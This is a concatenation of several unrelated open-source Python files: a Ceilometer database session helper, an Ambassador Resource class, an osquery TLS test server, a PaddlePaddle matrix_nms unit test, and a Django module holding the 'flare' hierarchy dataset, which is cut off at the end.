except sqla_exc.OperationalError as e: if (remaining != 'infinite' and remaining == 0) or \ not _is_db_connection_error(e.args[0]): raise return engine class Query(sqlalchemy.orm.query.Query): """Subclass of sqlalchemy.query with soft_delete() method.""" def soft_delete(self, synchronize_session='evaluate'): return self.update({'deleted': literal_column('id'), 'updated_at': literal_column('updated_at'), 'deleted_at': timeutils.utcnow()}, synchronize_session=synchronize_session) class Session(sqlalchemy.orm.session.Session): """Custom Session class to avoid SqlAlchemy Session monkey patching.""" @_wrap_db_error def query(self, *args, **kwargs): return super(Session, self).query(*args, **kwargs) @_wrap_db_error def flush(self, *args, **kwargs): return super(Session, self).flush(*args, **kwargs) @_wrap_db_error def execute(self, *args, **kwargs): return super(Session, self).execute(*args, **kwargs) def get_maker(engine, autocommit=True, expire_on_commit=False): """Return a SQLAlchemy sessionmaker using the given engine.""" return sqlalchemy.orm.sessionmaker(bind=engine, class_=Session, autocommit=autocommit, expire_on_commit=expire_on_commit, query_cls=Query) def _patch_mysqldb_with_stacktrace_comments(): """Adds current stack trace as a comment in queries. Patches MySQLdb.cursors.BaseCursor._do_query. """ import MySQLdb.cursors import traceback old_mysql_do_query = MySQLdb.cursors.BaseCursor._do_query def _do_query(self, q): stack = '' for filename, line, method, function in traceback.extract_stack(): # exclude various common things from trace if filename.endswith('session.py') and method == '_do_query': continue if filename.endswith('api.py') and method == 'wrapper': continue if filename.endswith('utils.py') and method == '_inner': continue if filename.endswith('exception.py') and method == '_wrap': continue # db/api is just a wrapper around db/sqlalchemy/api if filename.endswith('db/api.py'): continue # only trace inside ceilometer index = filename.rfind('ceilometer') if index == -1: continue stack += "File:%s:%s Method:%s() Line:%s | " \ % (filename[index:], line, method, function) # strip trailing " | " from stack if stack: stack = stack[:-3] qq = "%s /* %s */" % (q, stack) else: qq = q old_mysql_do_query(self, qq) setattr(MySQLdb.cursors.BaseCursor, '_do_query', _do_query) class EngineFacade(object): """A helper class for removing of global engine instances from ceilometer.db. As a library, ceilometer.db can't decide where to store/when to create engine and sessionmaker instances, so this must be left for a target application. On the other hand, in order to simplify the adoption of ceilometer.db changes, we'll provide a helper class, which creates engine and sessionmaker on its instantiation and provides get_engine()/get_session() methods that are compatible with corresponding utility functions that currently exist in target projects, e.g. in Nova. engine/sessionmaker instances will still be global (and they are meant to be global), but they will be stored in the app context, rather that in the ceilometer.db context. Note: using of this helper is completely optional and you are encouraged to integrate engine/sessionmaker instances into your apps any way you like (e.g. one might want to bind a session to a request context). Two important things to remember: 1. An Engine instance is effectively a pool of DB connections, so it's meant to be shared (and it's thread-safe). 2. A Session instance is not meant to be shared and represents a DB transactional context (i.e. it's not thread-safe). sessionmaker is a factory of sessions. """ def __init__(self, sql_connection, sqlite_fk=False, autocommit=True, expire_on_commit=False, **kwargs): """Initialize engine and sessionmaker instances. :param sqlite_fk: enable foreign keys in SQLite :type sqlite_fk: bool :param autocommit: use autocommit mode for created Session instances :type autocommit: bool :param expire_on_commit: expire session objects on commit :type expire_on_commit: bool Keyword arguments: :keyword mysql_sql_mode: the SQL mode to be used for MySQL sessions. (defaults to TRADITIONAL) :keyword idle_timeout: timeout before idle sql connections are reaped (defaults to 3600) :keyword connection_debug: verbosity of SQL debugging information. 0=None, 100=Everything (defaults to 0) :keyword max_pool_size: maximum number of SQL connections to keep open in a pool (defaults to SQLAlchemy settings) :keyword max_overflow: if set, use this value for max_overflow with sqlalchemy (defaults to SQLAlchemy settings) :keyword pool_timeout: if set, use this value for pool_timeout with sqlalchemy (defaults to SQLAlchemy settings) :keyword sqlite_synchronous: if True, SQLite uses synchronous mode (defaults to True) :keyword connection_trace: add python stack traces to SQL as comment strings (defaults to False) :keyword max_retries: maximum db connection retries during startup. (setting -1 implies an infinite retry count) (defaults to 10) :keyword retry_interval: interval between retries of opening a sql connection (defaults to 10) """ super(EngineFacade, self).__init__() self._engine = create_engine( sql_connection=sql_connection, sqlite_fk=sqlite_fk, mysql_sql_mode=kwargs.get('mysql_sql_mode', 'TRADITIONAL'), idle_timeout=kwargs.get('idle_timeout', 3600), connection_debug=kwargs.get('connection_debug', 0), max_pool_size=kwargs.get('max_pool_size'), max_overflow=kwargs.get('max_overflow'), pool_timeout=kwargs.get('pool_timeout'), sqlite_synchronous=kwargs.get('sqlite_synchronous', True), connection_trace=kwargs.get('connection_trace', False), max_retries=kwargs.get('max_retries', 10), retry_interval=kwargs.get('retry_interval', 10)) self._session_maker = get_maker( engine=self._engine, autocommit=autocommit, expire_on_commit=expire_on_commit) def get_engine(self): """Get the engine instance (note, that it's shared).""" return self._engine def get_session(self, **kwargs): """Get a Session instance. If passed, keyword arguments values override the ones used when the sessionmaker instance was created. :keyword autocommit: use autocommit mode for created Session instances :type autocommit: bool :keyword expire_on_commit: expire session objects on commit :type expire_on_commit: bool """ for arg in kwargs: if arg not in ('autocommit', 'expire_on_commit'): del kwargs[arg] return self._session_maker(**kwargs) @classmethod def from_config(cls, connection_string, conf, sqlite_fk=False, autocommit=True, expire_on_commit=False): """Initialize EngineFacade using oslo.config config instance options. :param connection_string: SQLAlchemy connection string :type connection_string: string :param conf: oslo.config config instance :type conf: oslo.config.cfg.ConfigOpts :param sqlite_fk: enable foreign keys in SQLite :type sqlite_fk: bool :param autocommit: use autocommit mode for created Session instances :type autocommit: bool :param expire_on_commit: expire session objects on commit :type expire_on_commit: bool """ return cls(sql_connection=connection_string, sqlite_fk=sqlite_fk, autocommit=autocommit, expire_on_commit=expire_on_commit, **dict(conf.database.items()))
import sys from typing import Any, Dict, List, Optional, Type, TypeVar import json from .utils import parse_yaml, dump_json from .cache import Cacheable R = TypeVar('R', bound='Resource') class Resource (Cacheable): """ A resource that's part of the overall Ambassador configuration world. This is the base class for IR resources, Ambassador-config resources, etc. Elements in a Resource: - rkey is a short identifier that is used as the primary key for _all_ the Ambassador classes to identify this single specific resource. It should be something like "ambassador-default.1" or the like: very specific, doesn't have to be fun for humans. - location is a more human-readable string describing where the human should go to find the source of this resource. "Service ambassador, namespace default, object 1". This isn't really used by the Config class, but the Diagnostics class makes heavy use of it. - kind (keyword-only) is what kind of Ambassador resource this is. - serialization (keyword-only) is the _original input serialization_, if we have it, of the object. If we don't have it, this should be None -- don't just serialize the object to no purpose. - any additional keyword arguments are saved in the Resource. :param rkey: unique identifier for this source, should be short :param location: where should a human go to find the source of this resource? :param kind: what kind of thing is this? :param serialization: original input serialization of obj, if we have it :param kwargs: key-value pairs that form the data object for this resource """ rkey: str location: str kind: str serialization: Optional[str] # _errors: List[RichStatus] _errored: bool _referenced_by: Dict[str, 'Resource'] def __init__(self, rkey: str, location: str, *, kind: str, serialization: Optional[str]=None, **kwargs) -> None: if not rkey: raise Exception("Resource requires rkey") if not kind: raise Exception("Resource requires kind") # print("Resource __init__ (%s %s)" % (kind, name)) super().__init__(rkey=rkey, location=location, kind=kind, serialization=serialization, # _errors=[], _referenced_by={}, **kwargs) def sourced_by(self, other: 'Resource'): self.rkey = other.rkey self.location = other.location def referenced_by(self, other: 'Resource') -> None: # print("%s %s REF BY %s %s" % (self.kind, self.name, other.kind, other.rkey)) self._referenced_by[other.location] = other def is_referenced_by(self, other_location) -> Optional['Resource']: return self._referenced_by.get(other_location, None) def __getattr__(self, key: str) -> Any: try: return self[key] except KeyError: raise AttributeError(key) def __setattr__(self, key: str, value: Any) -> None: self[key] = value def __str__(self) -> str: return("<%s %s>" % (self.kind, self.rkey)) def as_dict(self) -> Dict[str, Any]: ad = dict(self) ad.pop('rkey', None) ad.pop('serialization', None) ad.pop('location', None) ad.pop('_referenced_by', None) ad.pop('_errored', None) return ad def as_json(self): return dump_json(self.as_dict(), pretty=True) @classmethod def from_resource(cls: Type[R], other: R, rkey: Optional[str]=None, location: Optional[str]=None, kind: Optional[str]=None, serialization: Optional[str]=None, **kwargs) -> R: """ Create a Resource by copying another Resource, possibly overriding elements along the way. NOTE WELL: if you pass in kwargs, we assume that any values are safe to use as-is and DO NOT COPY THEM. Otherwise, we SHALLOW COPY other.attrs for the new Resource. :param other: the base Resource we're copying :param rkey: optional new rkey :param location: optional new location :param kind: optional new kind :param serialization: optional new original input serialization :param kwargs: optional new key-value pairs -- see discussion about copying above! """ # rkey and location are required positional arguments. Fine. new_rkey = rkey or other.rkey new_location = location or other.location # Make a shallow-copied dict that we can muck with... new_attrs = dict(kwargs) if kwargs else dict(other) # Don't include kind unless it comes in on this call. if kind: new_attrs['kind'] = kind else: new_attrs.pop('kind', None) # Don't include serialization at all if we don't have one. if serialization: new_attrs['serialization'] = serialization elif other.serialization: new_attrs['serialization'] = other.serialization # Make sure that things that shouldn't propagate are gone... new_attrs.pop('rkey', None) new_attrs.pop('location', None) new_attrs.pop('_errors', None) new_attrs.pop('_errored', None) new_attrs.pop('_referenced_by', None) # ...and finally, use new_attrs for all the keyword args when we set up # the new instance. return cls(new_rkey, new_location, **new_attrs) @classmethod def from_dict(cls: Type[R], rkey: str, location: str, serialization: Optional[str], attrs: Dict) -> R: """ Create a Resource or subclass thereof from a dictionary. The new Resource's rkey and location must be handed in explicitly. The difference between this and simply intializing a Resource object is that from_dict will introspect the attrs passed in and create whatever kind of Resource matches attrs['kind'] -- so for example, if kind is "Mapping", this method will return a Mapping rather than a Resource. :param rkey: unique identifier for this source, should be short :param location: where should a human go to find the source of this resource? :param serialization: original input serialization of obj :param attrs: dictionary from which to initialize the new object """ # So this is a touch odd but here we go. We want to use the Kind here to find # the correct type. ambassador = sys.modules['ambassador'] resource_class: Type[R] = getattr(ambassador, attrs['kind'], None) if not resource_class: resource_class = getattr(ambassador, 'AC' + attrs[ 'kind' ], cls) # print("%s.from_dict: %s => %s" % (cls, attrs['kind'], resource_class)) return resource_class(rkey, location=location, serialization=serialization, **attrs) @classmethod def from_yaml(cls: Type[R], rkey: str, location: str, serialization: str) -> R: """ Create a Resource from a YAML serialization. The new Resource's rkey and location must be handed in explicitly, and of course in this case the serialization is mandatory. Raises an exception if the serialization is not parseable. :param rkey: unique identifier for this source, should be short :param location: where should a human go to find the source of this resource? :param serialization: original input serialization of obj """ attrs = parse_yaml(serialization) return cls.from_dict(rkey, location, serialization, attrs)
#!/usr/bin/env python # Copyright (c) 2014, Facebook, Inc. # All rights reserved. # # This source code is licensed under the BSD-style license found in the # LICENSE file in the root directory of this source tree. An additional grant # of patent rights can be found in the PATENTS file in the same directory. from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import argparse import json import os import signal import ssl import sys # Create a simple TLS/HTTP server. from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer from urlparse import parse_qs EXAMPLE_CONFIG = { "schedule": { "tls_proc": {"query": "select * from processes", "interval": 0}, } } EXAMPLE_DISTRIBUTED = { "queries": { "info": "select * from osquery_info", "flags": "select * from osquery_flags", } } TEST_RESPONSE = { "foo": "bar", } NODE_KEYS = [ "this_is_a_node_secret", "this_is_also_a_node_secret", ] FAILED_ENROLL_RESPONSE = { "node_invalid": True } ENROLL_RESPONSE = { "node_key": "this_is_a_node_secret" } def debug(response): print("-- [DEBUG] %s" % str(response)) class RealSimpleHandler(BaseHTTPRequestHandler): def _set_headers(self): self.send_response(200) self.send_header('Content-type', 'application/json') self.end_headers() def do_GET(self): debug("RealSimpleHandler::get %s" % self.path) self._set_headers() self._reply(TEST_RESPONSE) def do_HEAD(self): debug("RealSimpleHandler::head %s" % self.path) self._set_headers() def do_POST(self): debug("RealSimpleHandler::post %s" % self.path) self._set_headers() content_len = int(self.headers.getheader('content-length', 0)) request = json.loads(self.rfile.read(content_len)) debug("Request: %s" % str(request)) if self.path == '/enroll': self.enroll(request) elif self.path == '/config': self.config(request) elif self.path == '/log': self.log(request) elif self.path == '/distributed_read': self.distributed_read(request) elif self.path == '/distributed_write': self.distributed_write(request) else: self._reply(TEST_RESPONSE) def enroll(self, request): '''A basic enrollment endpoint''' # This endpoint expects an "enroll_secret" POST body variable. # Over TLS, this string may be a shared secret value installed on every # managed host in an enterprise. # Alternatively, each client could authenticate with a TLS client cert. # Then, access to the enrollment endpoint implies the required auth. # A generated node_key is still supplied for identification. if ARGS.use_enroll_secret and ENROLL_SECRET != request["enroll_secret"]: self._reply(FAILED_ENROLL_RESPONSE) return self._reply(ENROLL_RESPONSE) def config(self, request): '''A basic config endpoint''' # This endpoint responds with a JSON body that is the entire config # content. There is no special key or status. # Authorization is simple authentication (the ability to download the # config data) using a "valid" node_key. Validity means the node_key is # known to this server. This toy server delivers a shared node_key, # imagine generating a unique node_key per enroll request, tracking the # generated keys, and asserting a match. # The osquery TLS config plugin calls the TLS enroll plugin to retrieve # a node_key, then submits that key alongside config/logger requests. if "node_key" not in request or request["node_key"] not in NODE_KEYS: self._reply(FAILED_ENROLL_RESPONSE) return self._reply(EXAMPLE_CONFIG) def distributed_read(self, request): '''A basic distributed read endpoint''' if "node_key" not in request or request["node_key"] not in NODE_KEYS: self._reply(FAILED_ENROLL_RESPONSE) return self._reply(EXAMPLE_DISTRIBUTED) def distributed_write(self, request): '''A basic distributed write endpoint''' self._reply({}) def log(self, request): self._reply({}) def _reply(self, response): debug("Replying: %s" % (str(response))) self.wfile.write(json.dumps(response)) def handler(signum, frame): print("[DEBUG] Shutting down HTTP server via timeout (%d) seconds." % (ARGS.timeout)) sys.exit(0) if __name__ == '__main__': SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__)) parser = argparse.ArgumentParser(description=( "osquery python https server for client TLS testing." )) parser.add_argument( "--tls", default=False, action="store_true", help="Wrap the HTTP server socket in TLS." ) parser.add_argument( "--persist", default=False, action="store_true", help="Wrap the HTTP server socket in TLS." ) parser.add_argument( "--timeout", default=10, type=int, help="If not persisting, exit after a number of seconds" ) parser.add_argument( "--cert", metavar="CERT_FILE", default=SCRIPT_DIR + "/test_server.pem", help="TLS server cert." ) parser.add_argument( "--key", metavar="PRIVATE_KEY_FILE", default=SCRIPT_DIR + "/test_server.key", help="TLS server cert private key." ) parser.add_argument( "--ca", metavar="CA_FILE", default=SCRIPT_DIR + "/test_server_ca.pem", help="TLS server CA list for client-auth." ) parser.add_argument( "--use_enroll_secret", action="store_true", default=True, help="Require an enrollment secret for node enrollment" ) parser.add_argument( "--enroll_secret", metavar="SECRET_FILE", default=SCRIPT_DIR + "/test_enroll_secret.txt", help="File containing enrollment secret" ) parser.add_argument( "port", metavar="PORT", type=int, help="Bind to which local TCP port." ) ARGS = parser.parse_args() ENROLL_SECRET = "" if ARGS.use_enroll_secret: try: with open(ARGS.enroll_secret, "r") as fh: ENROLL_SECRET = fh.read().strip() except IOError as e: print("Cannot read --enroll_secret: %s" % str(e)) exit(1) if not ARGS.persist: signal.signal(signal.SIGALRM, handler) signal.alarm(ARGS.timeout) httpd = HTTPServer(('localhost', ARGS.port), RealSimpleHandler) if ARGS.tls: if 'SSLContext' in vars(ssl): ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23) ctx.load_cert_chain(ARGS.cert, keyfile=ARGS.key) ctx.load_verify_locations(capath=ARGS.ca) ctx.options ^= ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3 httpd.socket = ctx.wrap_socket(httpd.socket, server_side=True) else: httpd.socket = ssl.wrap_socket(httpd.socket, ca_certs=ARGS.ca, ssl_version=ssl.PROTOCOL_SSLv23, certfile=ARGS.cert, keyfile=ARGS.key, server_side=True) debug("Starting TLS/HTTPS server on TCP port: %d" % ARGS.port) else: debug("Starting HTTP server on TCP port: %d" % ARGS.port) httpd.serve_forever()
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from __future__ import print_function import unittest import numpy as np import copy from op_test import OpTest import paddle.fluid as fluid from paddle.fluid import Program, program_guard def softmax(x): # clip to shiftx, otherwise, when calc loss with # log(exp(shiftx)), may get log(0)=INF shiftx = (x - np.max(x)).clip(-64.) exps = np.exp(shiftx) return exps / np.sum(exps) def iou_matrix(a, b, norm=True): tl_i = np.maximum(a[:, np.newaxis, :2], b[:, :2]) br_i = np.minimum(a[:, np.newaxis, 2:], b[:, 2:]) pad = not norm and 1 or 0 area_i = np.prod(br_i - tl_i + pad, axis=2) * (tl_i < br_i).all(axis=2) area_a = np.prod(a[:, 2:] - a[:, :2] + pad, axis=1) area_b = np.prod(b[:, 2:] - b[:, :2] + pad, axis=1) area_o = (area_a[:, np.newaxis] + area_b - area_i) return area_i / (area_o + 1e-10) def matrix_nms(boxes, scores, score_threshold, post_threshold=0., nms_top_k=400, normalized=True, use_gaussian=False, gaussian_sigma=2.): all_scores = copy.deepcopy(scores) all_scores = all_scores.flatten() selected_indices = np.where(all_scores > score_threshold)[0] all_scores = all_scores[selected_indices] sorted_indices = np.argsort(-all_scores, axis=0, kind='mergesort') sorted_scores = all_scores[sorted_indices] sorted_indices = selected_indices[sorted_indices] if nms_top_k > -1 and nms_top_k < sorted_indices.shape[0]: sorted_indices = sorted_indices[:nms_top_k] sorted_scores = sorted_scores[:nms_top_k] selected_boxes = boxes[sorted_indices, :] ious = iou_matrix(selected_boxes, selected_boxes) ious = np.triu(ious, k=1) iou_cmax = ious.max(0) N = iou_cmax.shape[0] iou_cmax = np.repeat(iou_cmax[:, np.newaxis], N, axis=1) if use_gaussian: decay = np.exp((iou_cmax**2 - ious**2) * gaussian_sigma) else: decay = (1 - ious) / (1 - iou_cmax) decay = decay.min(0) decayed_scores = sorted_scores * decay if post_threshold > 0.: inds = np.where(decayed_scores > post_threshold)[0] selected_boxes = selected_boxes[inds, :] decayed_scores = decayed_scores[inds] sorted_indices = sorted_indices[inds] return decayed_scores, selected_boxes, sorted_indices def multiclass_nms(boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, normalized, use_gaussian, gaussian_sigma): all_boxes = [] all_cls = [] all_scores = [] all_indices = [] for c in range(scores.shape[0]): if c == background: continue decayed_scores, selected_boxes, indices = matrix_nms( boxes, scores[c], score_threshold, post_threshold, nms_top_k, normalized, use_gaussian, gaussian_sigma) all_cls.append(np.full(len(decayed_scores), c, decayed_scores.dtype)) all_boxes.append(selected_boxes) all_scores.append(decayed_scores) all_indices.append(indices) all_cls = np.concatenate(all_cls) all_boxes = np.concatenate(all_boxes) all_scores = np.concatenate(all_scores) all_indices = np.concatenate(all_indices) all_pred = np.concatenate( (all_cls[:, np.newaxis], all_scores[:, np.newaxis], all_boxes), axis=1) num_det = len(all_pred) if num_det == 0: return all_pred, np.array([], dtype=np.float32) inds = np.argsort(-all_scores, axis=0, kind='mergesort') all_pred = all_pred[inds, :] all_indices = all_indices[inds] if keep_top_k > -1 and num_det > keep_top_k: num_det = keep_top_k all_pred = all_pred[:keep_top_k, :] all_indices = all_indices[:keep_top_k] return all_pred, all_indices def batched_multiclass_nms(boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, normalized=True, use_gaussian=False, gaussian_sigma=2.): batch_size = scores.shape[0] det_outs = [] index_outs = [] lod = [] for n in range(batch_size): nmsed_outs, indices = multiclass_nms( boxes[n], scores[n], background, score_threshold, post_threshold, nms_top_k, keep_top_k, normalized, use_gaussian, gaussian_sigma) nmsed_num = len(nmsed_outs) lod.append(nmsed_num) if nmsed_num == 0: continue indices += n * scores.shape[2] det_outs.append(nmsed_outs) index_outs.append(indices) if det_outs: det_outs = np.concatenate(det_outs) index_outs = np.concatenate(index_outs) return det_outs, index_outs, lod class TestMatrixNMSOp(OpTest): def set_argument(self): self.post_threshold = 0. self.use_gaussian = False def setUp(self): self.set_argument() N = 7 M = 1200 C = 21 BOX_SIZE = 4 background = 0 nms_top_k = 400 keep_top_k = 200 score_threshold = 0.01 post_threshold = self.post_threshold use_gaussian = False if hasattr(self, 'use_gaussian'): use_gaussian = self.use_gaussian gaussian_sigma = 2. scores = np.random.random((N * M, C)).astype('float32') scores = np.apply_along_axis(softmax, 1, scores) scores = np.reshape(scores, (N, M, C)) scores = np.transpose(scores, (0, 2, 1)) boxes = np.random.random((N, M, BOX_SIZE)).astype('float32') boxes[:, :, 0:2] = boxes[:, :, 0:2] * 0.5 boxes[:, :, 2:4] = boxes[:, :, 2:4] * 0.5 + 0.5 det_outs, index_outs, lod = batched_multiclass_nms( boxes, scores, background, score_threshold, post_threshold, nms_top_k, keep_top_k, True, use_gaussian, gaussian_sigma) empty = len(det_outs) == 0 det_outs = np.array([], dtype=np.float32) if empty else det_outs index_outs = np.array([], dtype=np.float32) if empty else index_outs nmsed_outs = det_outs.astype('float32') self.op_type = 'matrix_nms' self.inputs = {'BBoxes': boxes, 'Scores': scores} self.outputs = { 'Out': (nmsed_outs, [lod]), 'Index': (index_outs[:, None], [lod]), 'RoisNum': np.array(lod).astype('int32') } self.attrs = { 'background_label': 0, 'nms_top_k': nms_top_k, 'keep_top_k': keep_top_k, 'score_threshold': score_threshold, 'post_threshold': post_threshold, 'use_gaussian': use_gaussian, 'gaussian_sigma': gaussian_sigma, 'normalized': True, } def test_check_output(self): self.check_output() class TestMatrixNMSOpNoOutput(TestMatrixNMSOp): def set_argument(self): self.post_threshold = 2.0 class TestMatrixNMSOpGaussian(TestMatrixNMSOp): def set_argument(self): self.post_threshold = 0. self.use_gaussian = True class TestMatrixNMSError(unittest.TestCase): def test_errors(self): with program_guard(Program(), Program()): M = 1200 N = 7 C = 21 BOX_SIZE = 4 nms_top_k = 400 keep_top_k = 200 score_threshold = 0.01 post_threshold = 0. boxes_np = np.random.random((M, C, BOX_SIZE)).astype('float32') scores = np.random.random((N * M, C)).astype('float32') scores = np.apply_along_axis(softmax, 1, scores) scores = np.reshape(scores, (N, M, C)) scores_np = np.transpose(scores, (0, 2, 1)) boxes_data = fluid.data( name='bboxes', shape=[M, C, BOX_SIZE], dtype='float32') scores_data = fluid.data( name='scores', shape=[N, C, M], dtype='float32') def test_bboxes_Variable(): # the bboxes type must be Variable fluid.layers.matrix_nms( bboxes=boxes_np, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) def test_scores_Variable(): # the scores type must be Variable fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_np, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) def test_empty(): # when all score are lower than threshold try: fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=10., post_threshold=post_threshold) except Exception as e: self.fail(e) def test_coverage(): # cover correct workflow try: fluid.layers.matrix_nms( bboxes=boxes_data, scores=scores_data, nms_top_k=nms_top_k, keep_top_k=keep_top_k, score_threshold=score_threshold, post_threshold=post_threshold) except Exception as e: self.fail(e) self.assertRaises(TypeError, test_bboxes_Variable) self.assertRaises(TypeError, test_scores_Variable) test_coverage() if __name__ == '__main__': unittest.main()
from student.apps.courses.models import Course import json from django.forms.models import model_to_dict from core.apps.tools.common import render_json, dump_and_render_json, error_form_serialization data = { "name": "flare", "children": [ { "name": "analytics", "children": [ { "name": "cluster", "children": [ {"name": "AgglomerativeCluster", "size": 3938}, {"name": "CommunityStructure", "size": 3812}, {"name": "HierarchicalCluster", "size": 6714}, {"name": "MergeEdge", "size": 743} ] }, { "name": "graph", "children": [ {"name": "BetweennessCentrality", "size": 3534}, {"name": "LinkDistance", "size": 5731}, {"name": "MaxFlowMinCut", "size": 7840}, {"name": "ShortestPaths", "size": 5914}, {"name": "SpanningTree", "size": 3416} ] }, { "name": "optimization", "children": [ {"name": "AspectRatioBanker", "size": 7074} ] } ] }, { "name": "animate", "children": [ {"name": "Easing", "size": 17010}, {"name": "FunctionSequence", "size": 5842}, { "name": "interpolate", "children": [ {"name": "ArrayInterpolator", "size": 1983}, {"name": "ColorInterpolator", "size": 2047}, {"name": "DateInterpolator", "size": 1375}, {"name": "Interpolator", "size": 8746}, {"name": "MatrixInterpolator", "size": 2202}, {"name": "NumberInterpolator", "size": 1382}, {"name": "ObjectInterpolator", "size": 1629}, {"name": "PointInterpolator", "size": 1675}, {"name": "RectangleInterpolator", "size": 2042} ] }, {"name": "ISchedulable", "size": 1041}, {"name": "Parallel", "size": 5176}, {"name": "Pause", "size": 449}, {"name": "Scheduler", "size": 5593}, {"name": "Sequence", "size": 5534}, {"name": "Transition", "size": 9201}, {"name": "Transitioner", "size": 19975}, {"name": "TransitionEvent", "size": 1116}, {"name": "Tween", "size": 6006} ] }, { "name": "data", "children": [ { "name": "converters", "children": [ {"name": "Converters", "size": 721}, {"name": "DelimitedTextConverter", "size": 4294}, {"name": "GraphMLConverter", "size": 9800}, {"name": "IDataConverter", "size": 1314}, {"name": "JSONConverter", "size": 2220} ] }, {"name": "DataField", "size": 1759}, {"name": "DataSchema", "size": 2165}, {"name": "DataSet", "size": 586}, {"name": "DataSource", "size": 3331}, {"name": "DataTable", "size": 772}, {"name": "DataUtil", "size": 3322} ] }, { "name": "display", "children": [ {"name": "DirtySprite", "size": 8833}, {"name": "LineSprite", "size": 1732}, {"name": "RectSprite", "size": 3623}, {"name": "TextSprite", "size": 10066} ] }, { "name": "flex", "children": [ {"name": "FlareVis", "size": 4116} ] }, { "name": "physics", "children": [ {"name": "DragForce", "size": 1082}, {"name": "GravityForce", "size": 1336}, {"name": "IForce", "size": 319}, {"name": "NBodyForce", "size": 10498}, {"name": "Particle", "size": 2822}, {"name": "Simulation", "size": 9983}, {"name": "Spring", "size": 2213}, {"name": "SpringForce", "size": 1681} ] }, { "name": "query", "children": [ {"name": "AggregateExpression", "size": 1616}, {"name": "And", "size": 1027}, {"name": "Arithmetic", "size": 3891}, {"name": "Average", "size": 891}, {"name": "BinaryExpression", "size": 2893}, {"name": "Comparison", "size": 5103}, {"name": "CompositeExpression", "size": 3677}, {"name": "Count", "size": 781}, {"name": "DateUtil", "size": 4141}, {"name": "Distinct", "size": 933}, {"name": "Expression", "size": 5130}, {"name": "ExpressionIterator", "size": 3617}, {"name": "Fn", "size": 3240}, {"name": "If", "size": 2732}, {"name": "IsA", "size": 2039}, {"name": "Literal", "size": 1214}, {"name": "Match", "size": 3748}, {"name": "Maximum", "size": 843}, { "name": "methods", "children": [ {"name": "add", "size": 593}, {"name": "and", "size": 330}, {"name": "average", "size": 287}, {"name": "count", "size": 277}, {"name": "distinct", "size": 292}, {"name": "div", "size": 595}, {"name": "eq", "size": 594}, {"name": "fn", "size": 460}, {"name": "gt", "size": 603}, {"name": "gte", "size": 625}, {"name": "iff", "size": 748}, {"name": "isa", "size": 461}, {"name": "lt", "size": 597}, {"name": "lte", "size": 619}, {"name": "max", "size": 283}, {"name": "min", "size": 283}, {"name": "mod", "size": 591}, {"name": "mul", "size": 603}, {"name": "neq", "size": 599}, {"name": "not", "size": 386}, {"name": "or", "size": 323}, {"name": "orderby", "size": 307}, {"name": "range", "size": 772}, {"name": "select", "size": 296}, {"name": "stddev", "size": 363}, {"name": "sub", "size": 600}, {"name": "sum", "size": 280}, {"name": "update", "size": 307}, {"name": "variance", "size": 335}, {"name": "where", "size": 299}, {"name": "xor", "size": 354}, {"name": "_", "size": 264} ] }, {"name": "Minimum", "size": 843}, {"name": "Not", "size": 1554}, {"name": "Or", "size": 970}, {"name": "Query", "size": 13896}, {"name": "Range", "size": 1594}, {"name": "StringUtil", "size": 4130}, {"name": "Sum", "size": 791}, {"name": "Variable", "size": 1124}, {"name": "Variance", "size": 1876}, {"name": "Xor", "size": 1101} ] }, { "name": "scale", "children": [ {"name": "IScaleMap", "size": 2105}, {"name": "LinearScale", "size": 1316}, {"name": "LogScale", "size": 3151}, {"name": "OrdinalScale", "size": 3770}, {"name": "QuantileScale", "size": 2435}, {"name": "QuantitativeScale", "size": 4839}, {"name": "RootScale", "size": 1756}, {"name": "Scale", "size": 4268}, {"name": "ScaleType", "size": 1821}, {"name": "TimeScale", "size": 5833} ] }, { "name": "util", "children": [ {"name": "Arrays", "size": 8258}, {"name": "Colors", "size": 10001}, {"name": "Dates", "size": 8217}, {"name": "Displays", "size": 12555}, {"name": "Filter", "size": 2324}, {"name": "Geometry", "size": 10993}, { "name": "heap", "children": [ {"name": "FibonacciHeap", "size": 9354}, {"name": "HeapNode", "size": 1233} ] }, {"name": "IEvaluable", "size": 335}, {"name": "IPredicate", "size": 383}, {"name": "IValueProxy", "size": 874}, { "name": "math", "children": [ {"name": "DenseMatrix", "size": 3165}, {"name": "IMatrix", "size": 2815}, {"name": "SparseMatrix", "size": 3366} ] }, {"name": "Maths", "size": 17705}, {"name": "Orientation", "size": 1486}, { "name": "palette", "children": [ {"name": "ColorPalette", "size": 6367}, {"name": "Palette", "size": 1229}, {"name": "ShapePalette", "size": 2059}, {"name": "SizePalette", "size": 2291} ] }, {"name": "Property", "size": 5559}, {"name": "Shapes", "size": 19118}, {"name": "Sort", "size": 6887}, {"name": "Stats", "size": 6557}, {"name": "Strings", "size": 22026} ] }, { "name": "vis", "children": [ { "name": "axis", "children": [ {"name": "Axes", "size": 1302}, {"name": "Axis", "size": 24593}, {"name": "AxisGridLine", "size": 652}, {"name": "AxisLabel", "size": 636}, {"name": "CartesianAxes", "size": 6703} ] }, { "name": "controls", "children": [ {"name": "AnchorControl", "size": 2138}, {"name": "ClickControl", "size": 3824}, {"name": "Control", "size": 1353}, {"name": "ControlList", "size": 4665}, {"name": "DragControl", "size": 2649}, {"name": "ExpandControl", "size": 2832}, {"name": "HoverControl", "size": 4896}, {"name": "IControl", "size": 763}, {"name": "PanZoomControl", "size": 5222}, {"name": "SelectionControl", "size": 7862}, {"name": 